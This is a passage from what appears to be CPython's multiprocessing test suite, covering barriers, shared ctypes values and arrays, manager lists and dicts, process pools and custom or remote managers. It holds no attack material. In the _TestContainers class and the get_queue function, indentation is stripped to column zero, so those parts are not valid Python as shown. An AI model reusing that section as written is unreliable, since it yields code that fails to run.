        self.assertEqual(len(results3), self.N)

    @classmethod
    def _test_timeout_f(cls, barrier, results):
        i = barrier.wait()
        if i == cls.N//2:
            # One thread is late!
            time.sleep(1.0)
        try:
            barrier.wait(0.5)
        except threading.BrokenBarrierError:
            results.append(True)

    def test_timeout(self):
        """
        Test wait(timeout)
        """
        results = self.DummyList()
        self.run_threads(self._test_timeout_f, (self.barrier, results))
        self.assertEqual(len(results), self.barrier.parties)

    @classmethod
    def _test_default_timeout_f(cls, barrier, results):
        i = barrier.wait(cls.defaultTimeout)
        if i == cls.N//2:
            # One thread is later than the default timeout
            time.sleep(1.0)
        try:
            barrier.wait()
        except threading.BrokenBarrierError:
            results.append(True)

    def test_default_timeout(self):
        """
        Test the barrier's default timeout
        """
        barrier = self.Barrier(self.N, timeout=0.5)
        results = self.DummyList()
        self.run_threads(self._test_default_timeout_f, (barrier, results))
        self.assertEqual(len(results), barrier.parties)

    def test_single_thread(self):
        # A one-party barrier never blocks.
        b = self.Barrier(1)
        b.wait()
        b.wait()

    @classmethod
    def _test_thousand_f(cls, barrier, passes, conn, lock):
        for i in range(passes):
            barrier.wait()
            with lock:
                conn.send(i)

    def test_thousand(self):
        if self.TYPE == 'manager':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        passes = 1000
        lock = self.Lock()
        conn, child_conn = self.Pipe(False)
        for j in range(self.N):
            p = self.Process(target=self._test_thousand_f,
                             args=(self.barrier, passes, child_conn, lock))
            p.start()
            self.addCleanup(p.join)

        # Lockstep guarantees all N sends for pass i arrive before pass i+1.
        for i in range(passes):
            for j in range(self.N):
                self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
    """Shared-ctypes Value/RawValue behaviour (process type only)."""

    ALLOWED_TYPES = ('processes',)

    # (typecode, initial value, value written by the child)
    codes_values = [
        ('i', 4343, 24234),
        ('d', 3.625, -4.25),
        ('h', -232, 234),
        ('q', 2 ** 33, 2 ** 34),
        ('c', latin('x'), latin('y'))
        ]

    def setUp(self):
        if not HAS_SHAREDCTYPES:
            self.skipTest("requires multiprocessing.sharedctypes")

    @classmethod
    def _test(cls, values):
        # Child: overwrite every shared value with the third tuple element.
        for sv, cv in zip(values, cls.codes_values):
            sv.value = cv[2]

    def test_value(self, raw=False):
        if raw:
            values = [self.RawValue(code, value)
                      for code, value, _ in self.codes_values]
        else:
            values = [self.Value(code, value)
                      for code, value, _ in self.codes_values]

        for sv, cv in zip(values, self.codes_values):
            self.assertEqual(sv.value, cv[1])

        proc = self.Process(target=self._test, args=(values,))
        proc.daemon = True
        proc.start()
        proc.join()

        # Writes made in the child must be visible in this process.
        for sv, cv in zip(values, self.codes_values):
            self.assertEqual(sv.value, cv[2])

    def test_rawvalue(self):
        self.test_value(raw=True)

    def test_getobj_getlock(self):
        val1 = self.Value('i', 5)
        lock1 = val1.get_lock()
        obj1 = val1.get_obj()

        # lock=None behaves like the default (a fresh lock is created).
        val2 = self.Value('i', 5, lock=None)
        lock2 = val2.get_lock()
        obj2 = val2.get_obj()

        # An explicit lock object is used as-is.
        lock = self.Lock()
        val3 = self.Value('i', 5, lock=lock)
        lock3 = val3.get_lock()
        obj3 = val3.get_obj()
        self.assertEqual(lock, lock3)

        # lock=False yields a raw wrapper without lock accessors.
        arr4 = self.Value('i', 5, lock=False)
        self.assertFalse(hasattr(arr4, 'get_lock'))
        self.assertFalse(hasattr(arr4, 'get_obj'))

        self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')

        arr5 = self.RawValue('i', 5)
        self.assertFalse(hasattr(arr5, 'get_lock'))
        self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
    """Shared-ctypes Array/RawArray behaviour (process type only)."""

    ALLOWED_TYPES = ('processes',)

    @classmethod
    def f(cls, seq):
        # In-place prefix sum; used to verify child writes are shared.
        for i in range(1, len(seq)):
            seq[i] += seq[i-1]

    @unittest.skipIf(c_int is None, "requires _ctypes")
    def test_array(self, raw=False):
        seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
        if raw:
            arr = self.RawArray('i', seq)
        else:
            arr = self.Array('i', seq)

        self.assertEqual(len(arr), len(seq))
        self.assertEqual(arr[3], seq[3])
        self.assertEqual(list(arr[2:7]), list(seq[2:7]))

        arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])

        self.assertEqual(list(arr[:]), seq)

        # Apply the same transform locally and in a child, then compare.
        self.f(seq)

        p = self.Process(target=self.f, args=(arr,))
        p.daemon = True
        p.start()
        p.join()

        self.assertEqual(list(arr[:]), seq)

    @unittest.skipIf(c_int is None, "requires _ctypes")
    def test_array_from_size(self):
        size = 10
        # Test for zeroing (see issue #11675).
        # The repetition below strengthens the test by increasing the chances
        # of previously allocated non-zero memory being used for the new array
        # on the 2nd and 3rd loops.
        for _ in range(3):
            arr = self.Array('i', size)
            self.assertEqual(len(arr), size)
            self.assertEqual(list(arr), [0] * size)
            arr[:] = range(10)
            self.assertEqual(list(arr), list(range(10)))
            del arr

    @unittest.skipIf(c_int is None, "requires _ctypes")
    def test_rawarray(self):
        self.test_array(raw=True)

    @unittest.skipIf(c_int is None, "requires _ctypes")
    def test_getobj_getlock_obj(self):
        arr1 = self.Array('i', list(range(10)))
        lock1 = arr1.get_lock()
        obj1 = arr1.get_obj()

        # lock=None behaves like the default (a fresh lock is created).
        arr2 = self.Array('i', list(range(10)), lock=None)
        lock2 = arr2.get_lock()
        obj2 = arr2.get_obj()

        # An explicit lock object is used as-is.
        lock = self.Lock()
        arr3 = self.Array('i', list(range(10)), lock=lock)
        lock3 = arr3.get_lock()
        obj3 = arr3.get_obj()
        self.assertEqual(lock, lock3)

        # lock=False yields a raw wrapper without lock accessors.
        arr4 = self.Array('i', range(10), lock=False)
        self.assertFalse(hasattr(arr4, 'get_lock'))
        self.assertFalse(hasattr(arr4, 'get_obj'))
        self.assertRaises(AttributeError,
                          self.Array, 'i', range(10), lock='notalock')

        arr5 = self.RawArray('i', range(10))
        self.assertFalse(hasattr(arr5, 'get_lock'))
        self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
    """Nested DictProxy objects share state with the enclosing proxy and
    survive deletion of the local references to them."""
    pets = self.dict(ferrets=2, hamsters=4)
    supplies = self.dict(water=10, feed=3)
    d = self.dict(pets=pets, supplies=supplies)
    self.assertEqual(supplies['water'], 10)
    self.assertEqual(d['supplies']['water'], 10)
    # Writes through the outer proxy are visible via the inner one.
    d['supplies']['blankets'] = 5
    self.assertEqual(supplies['blankets'], 5)
    self.assertEqual(d['supplies']['blankets'], 5)
    d['supplies']['water'] = 7
    self.assertEqual(supplies['water'], 7)
    self.assertEqual(d['supplies']['water'], 7)
    # Server-side values persist after local proxy references are dropped.
    del pets
    del supplies
    self.assertEqual(d['pets']['ferrets'], 2)
    d['supplies']['blankets'] = 11
    self.assertEqual(d['supplies']['blankets'], 11)
    # Re-fetching the nested proxies yields live views again.
    pets = d['pets']
    supplies = d['supplies']
    supplies['water'] = 7
    self.assertEqual(supplies['water'], 7)
    self.assertEqual(d['supplies']['water'], 7)
    # Clearing the outer dict does not destroy objects still proxied.
    d.clear()
    self.assertEqual(len(d), 0)
    self.assertEqual(supplies['water'], 7)
    self.assertEqual(pets['hamsters'], 4)
    # Nested proxies also work inside a ListProxy.
    l = self.list([pets, supplies])
    l[0]['marmots'] = 1
    self.assertEqual(pets['marmots'], 1)
    self.assertEqual(l[0]['marmots'], 1)
    del pets
    del supplies
    self.assertEqual(l[0]['marmots'], 1)
    # Plain (non-proxy) containers are stored by value, not proxied.
    outer = self.list([[88, 99], l])
    self.assertIsInstance(outer[0], list)  # Not a ListProxy
    self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
    """Namespace proxy: attribute set/get/delete and repr behaviour."""
    ns = self.Namespace()
    ns.name = 'Bob'
    ns.job = 'Builder'
    ns._hidden = 'hidden'
    self.assertEqual((ns.name, ns.job), ('Bob', 'Builder'))
    del ns.job
    # Underscore-prefixed attributes do not appear in the repr.
    self.assertEqual(str(ns), "Namespace(name='Bob')")
    self.assertTrue(hasattr(ns, 'name'))
    self.assertTrue(not hasattr(ns, 'job'))
#
#
#
def sqr(x, wait=0.0):
    """Return ``x*x`` after optionally sleeping *wait* seconds (pool helper)."""
    time.sleep(wait)
    return x * x
def mul(x, y):
    """Return the product ``x * y`` (starmap helper)."""
    product = x * y
    return product
def raise_large_valuerror(wait):
    """Sleep *wait* seconds, then raise a ValueError with a ~1 MiB message."""
    time.sleep(wait)
    raise ValueError("x" * 1024**2)
def identity(x):
    """Return the argument unchanged (pool round-trip helper)."""
    return x
class CountedObject(object):
    """Object that tracks how many live instances exist (leak detection)."""

    # Number of instances currently alive.
    n_instances = 0

    def __new__(cls):
        cls.n_instances += 1
        return super().__new__(cls)

    def __del__(self):
        type(self).n_instances -= 1
class SayWhenError(ValueError):
    """Raised by exception_throwing_generator at the chosen point."""

def exception_throwing_generator(total, when):
    """Yield ``0 .. total-1``, raising SayWhenError once the index equals
    *when*.  A *when* of -1 raises before anything is yielded."""
    if when == -1:
        raise SayWhenError("Somebody said when")
    for idx in range(total):
        if idx == when:
            raise SayWhenError("Somebody said when")
        yield idx
class _TestPool(BaseTestCase):
    """Behavioural tests for the Pool flavours (processes/threads/manager)."""

    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        # A single shared 4-worker pool is reused by most tests below.
        cls.pool = cls.Pool(4)

    @classmethod
    def tearDownClass(cls):
        cls.pool.terminate()
        cls.pool.join()
        cls.pool = None
        super().tearDownClass()

    def test_apply(self):
        papply = self.pool.apply
        self.assertEqual(papply(sqr, (5,)), sqr(5))
        self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))

    def test_map(self):
        pmap = self.pool.map
        self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
        self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
                         list(map(sqr, list(range(100)))))

    def test_starmap(self):
        psmap = self.pool.starmap
        tuples = list(zip(range(10), range(9,-1, -1)))
        self.assertEqual(psmap(mul, tuples),
                         list(itertools.starmap(mul, tuples)))
        tuples = list(zip(range(100), range(99,-1, -1)))
        self.assertEqual(psmap(mul, tuples, chunksize=20),
                         list(itertools.starmap(mul, tuples)))

    def test_starmap_async(self):
        tuples = list(zip(range(100), range(99,-1, -1)))
        self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
                         list(itertools.starmap(mul, tuples)))

    def test_map_async(self):
        self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
                         list(map(sqr, list(range(10)))))

    def test_map_async_callbacks(self):
        # Success goes to callback, failure to error_callback.
        call_args = self.manager.list() if self.TYPE == 'manager' else []
        self.pool.map_async(int, ['1'],
                            callback=call_args.append,
                            error_callback=call_args.append).wait()
        self.assertEqual(1, len(call_args))
        self.assertEqual([1], call_args[0])
        self.pool.map_async(int, ['a'],
                            callback=call_args.append,
                            error_callback=call_args.append).wait()
        self.assertEqual(2, len(call_args))
        self.assertIsInstance(call_args[1], ValueError)

    def test_map_unplicklable(self):
        # Issue #19425 -- failure to pickle should not cause a hang
        if self.TYPE == 'threads':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        class A(object):
            def __reduce__(self):
                raise RuntimeError('cannot pickle')
        with self.assertRaises(RuntimeError):
            self.pool.map(sqr, [A()]*10)

    def test_map_chunksize(self):
        try:
            self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
        except multiprocessing.TimeoutError:
            self.fail("pool.map_async with chunksize stalled on null list")

    def test_map_handle_iterable_exception(self):
        if self.TYPE == 'manager':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError seen at the very first of the iterable
        with self.assertRaises(SayWhenError):
            self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
        # again, make sure it's reentrant
        with self.assertRaises(SayWhenError):
            self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
        with self.assertRaises(SayWhenError):
            self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
        class SpecialIterable:
            def __iter__(self):
                return self
            def __next__(self):
                raise SayWhenError
            def __len__(self):
                return 1
        with self.assertRaises(SayWhenError):
            self.pool.map(sqr, SpecialIterable(), 1)
        with self.assertRaises(SayWhenError):
            self.pool.map(sqr, SpecialIterable(), 1)

    def test_async(self):
        res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
        get = TimingWrapper(res.get)
        self.assertEqual(get(), 49)
        self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)

    def test_async_timeout(self):
        res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
        get = TimingWrapper(res.get)
        self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
        self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)

    def test_imap(self):
        it = self.pool.imap(sqr, list(range(10)))
        self.assertEqual(list(it), list(map(sqr, list(range(10)))))
        it = self.pool.imap(sqr, list(range(10)))
        for i in range(10):
            self.assertEqual(next(it), i*i)
        self.assertRaises(StopIteration, it.__next__)
        it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
        for i in range(1000):
            self.assertEqual(next(it), i*i)
        self.assertRaises(StopIteration, it.__next__)

    def test_imap_handle_iterable_exception(self):
        if self.TYPE == 'manager':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError seen at the very first of the iterable
        it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
        self.assertRaises(SayWhenError, it.__next__)
        # again, make sure it's reentrant
        it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
        self.assertRaises(SayWhenError, it.__next__)
        it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
        for i in range(3):
            self.assertEqual(next(it), i*i)
        self.assertRaises(SayWhenError, it.__next__)
        # SayWhenError seen at start of problematic chunk's results
        it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
        for i in range(6):
            self.assertEqual(next(it), i*i)
        self.assertRaises(SayWhenError, it.__next__)
        it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
        for i in range(4):
            self.assertEqual(next(it), i*i)
        self.assertRaises(SayWhenError, it.__next__)

    def test_imap_unordered(self):
        it = self.pool.imap_unordered(sqr, list(range(10)))
        self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
        it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
        self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))

    def test_imap_unordered_handle_iterable_exception(self):
        if self.TYPE == 'manager':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError seen at the very first of the iterable
        it = self.pool.imap_unordered(sqr,
                                      exception_throwing_generator(1, -1),
                                      1)
        self.assertRaises(SayWhenError, it.__next__)
        # again, make sure it's reentrant
        it = self.pool.imap_unordered(sqr,
                                      exception_throwing_generator(1, -1),
                                      1)
        self.assertRaises(SayWhenError, it.__next__)
        it = self.pool.imap_unordered(sqr,
                                      exception_throwing_generator(10, 3),
                                      1)
        expected_values = list(map(sqr, list(range(10))))
        with self.assertRaises(SayWhenError):
            # imap_unordered makes it difficult to anticipate the SayWhenError
            for i in range(10):
                value = next(it)
                self.assertIn(value, expected_values)
                expected_values.remove(value)
        it = self.pool.imap_unordered(sqr,
                                      exception_throwing_generator(20, 7),
                                      2)
        expected_values = list(map(sqr, list(range(20))))
        with self.assertRaises(SayWhenError):
            for i in range(20):
                value = next(it)
                self.assertIn(value, expected_values)
                expected_values.remove(value)

    def test_make_pool(self):
        # A non-positive worker count must be rejected.
        expected_error = (RemoteError if self.TYPE == 'manager'
                          else ValueError)
        self.assertRaises(expected_error, self.Pool, -1)
        self.assertRaises(expected_error, self.Pool, 0)
        if self.TYPE != 'manager':
            p = self.Pool(3)
            try:
                self.assertEqual(3, len(p._pool))
            finally:
                p.close()
                p.join()

    def test_terminate(self):
        result = self.pool.map_async(
            time.sleep, [0.1 for i in range(10000)], chunksize=1
            )
        self.pool.terminate()
        join = TimingWrapper(self.pool.join)
        join()
        # Sanity check the pool didn't wait for all tasks to finish
        self.assertLess(join.elapsed, 2.0)

    def test_empty_iterable(self):
        # See Issue 12157
        p = self.Pool(1)
        self.assertEqual(p.map(sqr, []), [])
        self.assertEqual(list(p.imap(sqr, [])), [])
        self.assertEqual(list(p.imap_unordered(sqr, [])), [])
        self.assertEqual(p.map_async(sqr, []).get(), [])
        p.close()
        p.join()

    def test_context(self):
        if self.TYPE == 'processes':
            L = list(range(10))
            expected = [sqr(i) for i in L]
            with self.Pool(2) as p:
                r = p.map_async(sqr, L)
                self.assertEqual(r.get(), expected)
            p.join()
            # After the with-block the pool is terminated.
            self.assertRaises(ValueError, p.map_async, sqr, L)

    @classmethod
    def _test_traceback(cls):
        raise RuntimeError(123) # some comment

    def test_traceback(self):
        # We want ensure that the traceback from the child process is
        # contained in the traceback raised in the main process.
        if self.TYPE == 'processes':
            with self.Pool(1) as p:
                try:
                    p.apply(self._test_traceback)
                except Exception as e:
                    exc = e
                else:
                    self.fail('expected RuntimeError')
                p.join()
            self.assertIs(type(exc), RuntimeError)
            self.assertEqual(exc.args, (123,))
            cause = exc.__cause__
            self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
            self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
            with test.support.captured_stderr() as f1:
                try:
                    raise exc
                except RuntimeError:
                    sys.excepthook(*sys.exc_info())
            self.assertIn('raise RuntimeError(123) # some comment',
                          f1.getvalue())
            # _helper_reraises_exception should not make the error
            # a remote exception
            with self.Pool(1) as p:
                try:
                    p.map(sqr, exception_throwing_generator(1, -1), 1)
                except Exception as e:
                    exc = e
                else:
                    self.fail('expected SayWhenError')
                self.assertIs(type(exc), SayWhenError)
                self.assertIs(exc.__cause__, None)
                p.join()

    @classmethod
    def _test_wrapped_exception(cls):
        raise RuntimeError('foo')

    def test_wrapped_exception(self):
        # Issue #20980: Should not wrap exception when using thread pool
        with self.Pool(1) as p:
            with self.assertRaises(RuntimeError):
                p.apply(self._test_wrapped_exception)
            p.join()

    def test_map_no_failfast(self):
        # Issue #23992: the fail-fast behaviour when an exception is raised
        # during map() would make Pool.join() deadlock, because a worker
        # process would fill the result queue (after the result handler thread
        # terminated, hence not draining it anymore).
        t_start = time.monotonic()
        with self.assertRaises(ValueError):
            with self.Pool(2) as p:
                try:
                    p.map(raise_large_valuerror, [0, 1])
                finally:
                    time.sleep(0.5)
                    p.close()
                    p.join()
        # check that we indeed waited for all jobs
        self.assertGreater(time.monotonic() - t_start, 0.9)

    def test_release_task_refs(self):
        # Issue #29861: task arguments and results should not be kept
        # alive after we are done with them.
        objs = [CountedObject() for i in range(10)]
        refs = [weakref.ref(o) for o in objs]
        self.pool.map(identity, objs)
        del objs
        time.sleep(DELTA)  # let threaded cleanup code run
        self.assertEqual(set(wr() for wr in refs), {None})
        # With a process pool, copies of the objects are returned, check
        # they were released too.
        self.assertEqual(CountedObject.n_instances, 0)

    def test_enter(self):
        if self.TYPE == 'manager':
            self.skipTest("test not applicable to manager")
        pool = self.Pool(1)
        with pool:
            pass
            # call pool.terminate()
        # pool is no longer running
        with self.assertRaises(ValueError):
            # bpo-35477: pool.__enter__() fails if the pool is not running
            with pool:
                pass
        pool.join()

    def test_resource_warning(self):
        if self.TYPE == 'manager':
            self.skipTest("test not applicable to manager")
        pool = self.Pool(1)
        pool.terminate()
        pool.join()
        # force state to RUN to emit ResourceWarning in __del__()
        pool._state = multiprocessing.pool.RUN
        with support.check_warnings(('unclosed running multiprocessing pool',
                                     ResourceWarning)):
            pool = None
            support.gc_collect()
def raising():
    """Helper for error-callback tests: unconditionally raise KeyError."""
    raise KeyError("key")
def unpickleable_result():
    """Return a lambda, which the pool's result handler cannot pickle."""
    return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
    """Propagation of worker errors through error_callback and result.get()."""
    ALLOWED_TYPES = ('processes', )

    def test_async_error_callback(self):
        p = multiprocessing.Pool(2)
        scratchpad = [None]
        def errback(exc):
            scratchpad[0] = exc
        res = p.apply_async(raising, error_callback=errback)
        self.assertRaises(KeyError, res.get)
        self.assertTrue(scratchpad[0])
        self.assertIsInstance(scratchpad[0], KeyError)
        p.close()
        p.join()

    def test_unpickleable_result(self):
        from multiprocessing.pool import MaybeEncodingError
        p = multiprocessing.Pool(2)
        # Make sure we don't lose pool processes because of encoding errors.
        for iteration in range(20):
            scratchpad = [None]
            def errback(exc):
                scratchpad[0] = exc
            res = p.apply_async(unpickleable_result, error_callback=errback)
            self.assertRaises(MaybeEncodingError, res.get)
            wrapped = scratchpad[0]
            self.assertTrue(wrapped)
            self.assertIsInstance(scratchpad[0], MaybeEncodingError)
            self.assertIsNotNone(wrapped.exc)
            self.assertIsNotNone(wrapped.value)
        p.close()
        p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
    """Worker replacement behaviour when maxtasksperchild is set."""
    ALLOWED_TYPES = ('processes', )

    def test_pool_worker_lifetime(self):
        p = multiprocessing.Pool(3, maxtasksperchild=10)
        self.assertEqual(3, len(p._pool))
        origworkerpids = [w.pid for w in p._pool]
        # Run many tasks so each worker gets replaced (hopefully)
        results = []
        for i in range(100):
            results.append(p.apply_async(sqr, (i, )))
        # Fetch the results and verify we got the right answers,
        # also ensuring all the tasks have completed.
        for (j, res) in enumerate(results):
            self.assertEqual(res.get(), sqr(j))
        # Refill the pool
        p._repopulate_pool()
        # Wait until all workers are alive
        # (countdown * DELTA = 5 seconds max startup process time)
        countdown = 50
        while countdown and not all(w.is_alive() for w in p._pool):
            countdown -= 1
            time.sleep(DELTA)
        finalworkerpids = [w.pid for w in p._pool]
        # All pids should be assigned.  See issue #7805.
        self.assertNotIn(None, origworkerpids)
        self.assertNotIn(None, finalworkerpids)
        # Finally, check that the worker pids have changed
        self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
        p.close()
        p.join()

    def test_pool_worker_lifetime_early_close(self):
        # Issue #10332: closing a pool whose workers have limited lifetimes
        # before all the tasks completed would make join() hang.
        p = multiprocessing.Pool(3, maxtasksperchild=1)
        results = []
        for i in range(6):
            results.append(p.apply_async(sqr, (i, 0.3)))
        p.close()
        p.join()
        # check the results
        for (j, res) in enumerate(results):
            self.assertEqual(res.get(), sqr(j))

    def test_worker_finalization_via_atexit_handler_of_multiprocessing(self):
        # tests cases against bpo-38744 and bpo-39360
        cmd = '''if 1:
            from multiprocessing import Pool
            problem = None
            class A:
                def __init__(self):
                    self.pool = Pool(processes=1)
            def test():
                global problem
                problem = A()
                problem.pool.map(float, tuple(range(10)))
            if __name__ == "__main__":
                test()
        '''
        rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
        self.assertEqual(rc, 0)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
    """Target class for manager method-exposure tests."""

    def f(self):
        """Public method returning the literal string 'f()'."""
        return 'f()'

    def g(self):
        """Public method that always raises ValueError."""
        raise ValueError

    def _h(self):
        """Underscore-prefixed method, not exposed by default registration."""
        return '_h()'
def baz():
    """Return an iterator over the squares of 0..9."""
    return (n * n for n in range(10))
class IteratorProxy(BaseProxy):
    """Proxy exposing only the iterator protocol of its referent."""
    _exposed_ = ('__next__',)
    def __iter__(self):
        return self
    def __next__(self):
        # Forward each step to the referent living in the manager process.
        return self._callmethod('__next__')
class MyManager(BaseManager):
    """Customized manager class; test types are registered on it."""
    pass
# 'Foo' uses default exposure (public methods only); 'Bar' explicitly
# exposes f and _h; 'baz' serves an iterator through IteratorProxy.
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
    """Tests for the customized BaseManager subclass (MyManager)."""
    ALLOWED_TYPES = ('manager',)

    def test_mymanager(self):
        manager = MyManager()
        manager.start()
        self.common(manager)
        manager.shutdown()
        # bpo-30356: BaseManager._finalize_manager() sends SIGTERM
        # to the manager process if it takes longer than 1 second to stop,
        # which happens on slow buildbots.
        self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))

    def test_mymanager_context(self):
        with MyManager() as manager:
            self.common(manager)
        # bpo-30356: BaseManager._finalize_manager() sends SIGTERM
        # to the manager process if it takes longer than 1 second to stop,
        # which happens on slow buildbots.
        self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))

    def test_mymanager_context_prestarted(self):
        manager = MyManager()
        manager.start()
        with manager:
            self.common(manager)
        self.assertEqual(manager._process.exitcode, 0)

    def common(self, manager):
        # Shared body: checks exposure rules and proxy method dispatch.
        foo = manager.Foo()
        bar = manager.Bar()
        baz = manager.baz()
        foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
        bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
        self.assertEqual(foo_methods, ['f', 'g'])
        self.assertEqual(bar_methods, ['f', '_h'])
        self.assertEqual(foo.f(), 'f()')
        self.assertRaises(ValueError, foo.g)
        self.assertEqual(foo._callmethod('f'), 'f()')
        self.assertRaises(RemoteError, foo._callmethod, '_h')
        self.assertEqual(bar.f(), 'f()')
        self.assertEqual(bar._h(), '_h()')
        self.assertEqual(bar._callmethod('f'), 'f()')
        self.assertEqual(bar._callmethod('_h'), '_h()')
        self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
    '''manager class used by server process'''

# Server side supplies the callable that produces the shared queue.
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
    '''manager class which specifies the same interface as QueueManager'''

# Client side registers only the method name; no local callable needed.
QueueManager2.register('get_queue')
# Serializer name passed to the managers below; _TestRemoteManager relies on
# xmlrpclib-based serialization rejecting non-serializable objects.
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
    """Connecting to a remote manager server using xmlrpclib serialization."""
    ALLOWED_TYPES = ('manager',)
    # Sample values exercising unicode and bytes round-trips.
    values = ['hello world', None, True, 2.25,
              'hall\xe5 v\xe4rlden',
              '\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
              b'hall\xe5 v\xe4rlden',
             ]
    result = values[:]

    @classmethod
    def _putter(cls, address, authkey):
        manager = QueueManager2(
            address=address, authkey=authkey, serializer=SERIALIZER
            )
        manager.connect()
        queue = manager.get_queue()
        # Note that xmlrpclib will deserialize object as a list not a tuple
        queue.put(tuple(cls.values))

    def test_remote(self):
        authkey = os.urandom(32)
        manager = QueueManager(
            address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
            )
        manager.start()
        self.addCleanup(manager.shutdown)
        p = self.Process(target=self._putter, args=(manager.address, authkey))
        p.daemon = True
        p.start()
        manager2 = QueueManager2(
            address=manager.address, authkey=authkey, serializer=SERIALIZER
            )
        manager2.connect()
        queue = manager2.get_queue()
        self.assertEqual(queue.get(), self.result)
        # Because we are using xmlrpclib for serialization instead of
        # pickle this will cause a serialization error.
        self.assertRaises(Exception, queue.put, time.sleep)
        # Make queue finalizer run before the server is stopped
        del queue
class _TestManagerRestart(BaseTestCase):
    """Restarting a manager server on the same address."""

    @classmethod
    def _putter(cls, address, authkey):
        manager = QueueManager(
            address=address, authkey=authkey, serializer=SERIALIZER)
        manager.connect()
        queue = manager.get_queue()
        queue.put('hello world')

